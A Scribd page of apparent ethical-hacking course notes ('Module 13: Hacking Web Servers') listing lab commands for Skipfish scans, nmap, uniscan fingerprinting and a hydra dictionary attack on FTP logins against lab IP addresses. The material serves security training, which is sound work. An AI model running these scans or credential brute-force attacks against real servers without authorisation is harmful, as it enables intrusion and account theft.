0% found this document useful (0 votes)
5 views

Module13 Hacking Web Servers

The document outlines various techniques for hacking web servers, including reconnaissance with Skipfish, footprinting using httprecon and ID Serve, and cracking FTP credentials with a dictionary attack. It provides command-line instructions for tools like nmap, hydra, and uniscan to perform these tasks. The focus is on practical applications in a cybersecurity context.

Uploaded by

Aamir Khan
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
5 views

Module13 Hacking Web Servers

The document outlines various techniques for hacking web servers, including reconnaissance with Skipfish, footprinting using httprecon and ID Serve, and cracking FTP credentials with a dictionary attack. It provides command-line instructions for tools like nmap, hydra, and uniscan to perform these tasks. The focus is on practical applications in a cybersecurity context.

Uploaded by

Aamir Khan
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

Module 13: Hacking Web Servers

Performing Web Server Reconnaissance using Skipfish


skipfish -o /root/test -S /usr/share/skipfish/dictionaries/complete.wl
http://[IP Address of Windows Server 2012]:8080

Footprinting a Web Server Using the httprecon Tool


Windows tool

Footprinting a Web Server Using ID Serve

Cracking FTP Credentials Using Dictionary Attack


nmap -p 21 10.10.10.10
hydra -L /root/Desktop/Wordlists/Usernames.txt -P
/root/Desktop/Wordlists/Passwords.txt ftp://[IP Address of Windows 10]

Uniscan Web Server Fingerprinting in Kali Linux


uniscan -h
uniscan -u http://10.10.10.12:8080/CEH -q
uniscan -u http://10.10.10.12:8080/CEH -we
uniscan -u http://10.10.10.12:8080/CEH -d
/usr/share/uniscan/report

You might also like